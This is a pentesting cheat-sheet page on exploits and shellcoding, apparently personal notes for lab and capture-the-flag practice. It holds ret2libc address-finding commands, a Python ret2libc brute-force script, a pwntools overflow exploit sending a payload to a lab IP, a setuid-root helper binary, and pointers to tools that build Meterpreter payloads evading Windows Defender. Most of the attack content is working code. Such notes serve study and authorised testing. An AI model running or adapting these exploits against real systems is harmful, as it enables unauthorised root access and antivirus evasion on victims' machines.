Exploits and shellcoding

Quick Reference

  • Hexdump (python format): hexdump -v -e '"\\""x" 1/1 "%02x" ""' example.exe
  • Print hex encoded string in text: printf $(cat file.txt | tr -d '\n')
  • Passing binary data as arguments: command $(python -c 'print ...')
  • Passing binary data as standard input: python -c 'print ...' | command
  • Use file as input and then read from standard input: cat file - | command python -c 'print ...' | cat file - | command
  • Cross compile with - mingw32
    i586-mingw32msvc-gcc a.c
    wine a.exe
    
    export file=shell
    i686-w64-mingw32-gcc -c -O3 -march=i686 $file.c
    i686-w64-mingw32-gcc $file.o -o $file.exe -O3 -march=i686 -Wl,-lws2_32
    /usr/i686-w64-mingw32/bin/strip $file.exe
    
  • Printing shell code
    (Bash) echo -e '\x31\xc0\x50\x68\x2f...'
    (Python) python -c 'print "\x31\xc0\x50\x68\x2f..."'
    (Perl) perl -e 'print "\x31\xc0\x50\x68\x2f..."'
    

Fuzzing

Tools

Buffer Overflow

Introductions

Tools - Detection / Testing: - Program to detect the existence of remote / local stack-based buffer-overflow vulnerabilities (FTP, IMAP, POP3 and SMTP): https://github.com/iricartb/buffer-overflow-vulnerability-services-tester-tool - https://hakin9.org/bovstt-buffer-overflow-vulnerability-services-tester-tool/

Techniques

  • ret2libc
    • Find libc address: ​ldd /usr/local/bin/backup
    • Find libc system function: ​readelf -s /lib/i386-linux-gnu/libc.so.6 | grep system
    • Find libc exit function: ​readelf -s /lib/i386-linux-gnu/libc.so.6 | grep exit
    • Find libc /bin/sh reference: ​strings -a -t x /lib/i386-linux-gnu/libc.so.6 | grep /bin/sh

Practice

Exploit Stubs

import struct, subprocess

libc = 0xf75e2000
sysOffset = 0x0003a940
sysAddress = libc + sysOffset
exitOffset = 0x0002e7b0
exitAddress = libc + exitOffset
binsh = libc + 0x0015900b

payload = "A" * 512
payload += struct.pack("<I", sysAddress)
payload += struct.pack("<I", exitAddress)
payload += struct.pack("<I", binsh)

attempts = 0

while True:
  attempts += 1
  print "Attempts: " + attempts
  subprocess.call(["/usr/local/bin/vulnerable-binary", "arg1", "arg2", payload])
from pwn import *

shellcode = ""

payload = "A"*28 + p32(0xffffd630) + shellcode
r = remote('10.10.10.34', 7411)
print r.recv(1024)

r.sendline('USER admin')
print r.recv(1024)

r.sendline('PASS ' + payload)
r.interactive()

Simple SUID Binary

#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>

int main()
{
  setuid(0);
  setgid(0);
  system("id");
  return 0;
}

Lateral Movement

Defense

DEP

Perform additional checks on memory, to help prevent malicious code from running on a system.

Prevent code execution from data pages, by raising an exception, when execution occurs.

ASLR

Randomizes the base addresses of loaded applications, and DLLs, every time the Operating System is booted.

LD_PRELOAD

  • Load a custom library and override functions of a program
    g++ test.cpp -std=c++11 -shared -o test.so -fPIC  #PIC=Position independent code
    LD_PRELOAD=test.so ldd ./exampleapp
    

Shellcode

Tools

Windows

  • SEToolKit ’s Powershell alphanumeric shellcode injector to generate a Meterpreter payload that will bypass Windows Defender
  • Shellter - Dynamic shellcode injection tool, and the first truly dynamic PE infector ever created: [Intro] [Pro-features]

Search

OS

Other

References

Programming

Windows Specific

Persistence

Return oriented programming (ROP)